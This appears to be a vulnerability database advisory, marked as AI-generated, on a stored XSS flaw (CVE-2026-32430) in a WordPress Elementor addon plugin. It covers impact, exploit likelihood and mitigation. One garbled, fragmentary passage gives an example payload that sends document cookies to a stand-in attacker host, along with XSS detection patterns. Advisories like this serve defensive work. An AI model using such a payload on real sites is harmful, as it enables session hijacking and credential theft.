
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-32430 is a Stored Cross-Site Scripting (XSS) vulnerability in the PowerPack Addons for Elementor plugin (powerpack-lite-for-elementor) developed by IdeaBox Creations. It affects all versions from n/a through 2.9.9 and was published on March 13, 2026, with the CVE assigned by Patchstack. The vulnerability carries a CVSS v3.1 base score of 6.5 (Medium) (Feedly, Patchstack).
The vulnerability is classified under CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-site Scripting), specifically the Stored XSS variant. An authenticated attacker with low privileges can inject malicious scripts into fields processed by the plugin, which are then persistently stored and rendered in the browser of any user who views the affected page. The attack vector is network-based, requires low privileges and user interaction (a victim must view the injected content), and the scope is changed, meaning the impact extends beyond the vulnerable component itself (Feedly).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of other users' browsers, including administrators, potentially leading to session hijacking, credential theft, unauthorized administrative actions, or defacement of WordPress site content. Because the payload is stored server-side, every user who visits the affected page is at risk without any further attacker interaction. The changed scope indicates that the impact can extend to components beyond the plugin itself, such as the broader WordPress environment (Feedly).
No public proof-of-concept exploit code or evidence of active in-the-wild exploitation has been reported as of the available data. The EPSS score is approximately 0.029% (0.000290), indicating a low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. The requirement for low-privilege authentication reduces the attack surface compared to unauthenticated XSS vulnerabilities (Feedly).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>) into a vulnerable input field processed by the PowerPack Addons for Elementor plugin, such as a widget setting or custom field.<script>, onerror=, onload=).wp_postmeta or wp_options tables associated with PowerPack Addons widget settings.Users should update the PowerPack Addons for Elementor plugin to a version beyond 2.9.9 that includes a fix for this vulnerability. Until a patched version is available or applied, administrators should restrict plugin editing and content creation capabilities to trusted users only, minimizing the risk from low-privilege accounts. Additionally, deploying a Web Application Firewall (WAF) with XSS filtering rules can help detect and block exploitation attempts (Patchstack).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."